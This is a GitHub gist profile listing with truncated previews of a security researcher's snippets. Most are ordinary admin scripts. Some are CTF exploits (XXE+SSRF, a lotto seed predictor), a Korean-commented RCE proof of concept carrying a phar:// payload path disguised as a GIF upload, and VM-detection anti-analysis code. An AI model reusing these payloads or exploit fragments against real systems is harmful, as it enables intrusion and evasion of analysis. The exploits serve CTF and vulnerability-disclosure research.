Skip to content

Instantly share code, notes, and snippets.

View stypr's full-sized avatar
🆎**********************************
Be Lazy~

Harold Kim stypr

🆎**********************************
Be Lazy~
540 followers · 122 following
View GitHub Profile
@stypr
stypr / ping.php
Created February 6, 2015 19:15
cloudflare auto ddns + memory flush
#!/usr/bin/php
<?php
/*
* crontab -e
* 0 5 * * * ~/ping.php
*/
error_reporting(0);
set_time_limit(0);
@stypr
stypr / wlan_mac.py
Created February 7, 2015 06:05
Change WLAN MAC address randomly in OSX
#!/usr/bin/python
import os
import sys
check_root = os.popen("whoami").read().strip()
if check_root == "root":
mac_real = os.popen("ifconfig en0 | grep ether") \
.read().strip().replace("ether ", "")
mac_hex = os.popen("openssl rand -hex 6").read().strip()
@stypr
stypr / gist:1bbed682337cdd64e101
Created February 11, 2015 03:27
IP ban and check for fake IPs
<?php
/* This won't work on Tor services */
function checkSecurity(){
$list = "ban.txt";
$deny = array();
$fo = fopen($list, "r");
$str = fread($fo, filesize($list));
fclose($fo);
$str = str_replace(",","_",$str);
$ary = explode("_",$str);
@stypr
stypr / pipupdate.py
Created July 1, 2015 09:24
pip update all packages
import pip
from subprocess import call
for dist in pip.get_installed_distributions():
call("pip install --upgrade " + dist.project_name, shell=True)
@stypr
stypr / exploit.py
Created November 3, 2017 09:58
familiar (485pt) XXE + SSRF
#!/usr/bin/python -u
#-*- encoding: utf-8 -*-
import os
import sys
import requests
import json
from base64 import *
HOST = "core.eagle-jump.org"
@stypr
stypr / VirtualMachineDetect.bas
Created February 7, 2015 06:11
Detect software-based Virtual Machine in VB6
Public Function VirtualMachineProtect() As Boolean
'VMs are easily detectable by registry and library checkup
On Error Resume Next
Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
Dim me32 As MODULEENTRY32
Dim szBuffer As String * 128
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)
me32.dwSize = Len(me32)
Module32First hSnapShot, me32
Do While Module32Next(hSnapShot, me32) <> 0
@stypr
stypr / iptables-irccloud.sh
Created October 29, 2017 14:42
iptables configuration for connections between irssiproxy and irccloud
iptables -N irccloud
iptables -A irccloud --src 192.184.9.108 -j ACCEPT
iptables -A irccloud --src 192.184.9.110 -j ACCEPT
iptables -A irccloud --src 192.184.9.112 -j ACCEPT
iptables -A irccloud --src 192.184.10.118 -j ACCEPT
iptables -A irccloud --src 192.184.10.9 -j ACCEPT
iptables -A irccloud --src 170.178.187.131 -j ACCEPT
iptables -A irccloud --src 192.184.8.73 -j ACCEPT
iptables -A irccloud --src 192.184.8.103 -j ACCEPT
iptables -A irccloud -j DROP
@stypr
stypr / README.md
Last active June 22, 2019 15:47
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

@stypr
stypr / attack_script.js
Last active August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
// 업로드한 파일의 페이로드.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// 먼저 공격에 앞서, 해당 기능을 지원하는 관리자인지 확인한다.
$.get(`../qa_config.php`, function(d){
// 수정할 곳은 ”파일 경로“ 가 들어간 곳이므로, 이 부분만 우선 확인한다.
if(d.indexOf(`상단 파일 경로`) !== false){
@stypr
stypr / 9en3rat0r.php
Last active August 3, 2019 16:54
Lotto Exploit
<?php
function generator()
{
$PATH = "./s3cre7_fi1e";
$init_seed = 0;
if(!file_exists(realpath($PATH)))
{
$init_seed = $seed = intval(uniqid(),10);
$f = fopen($PATH,"w");
fwrite($f,$init_seed);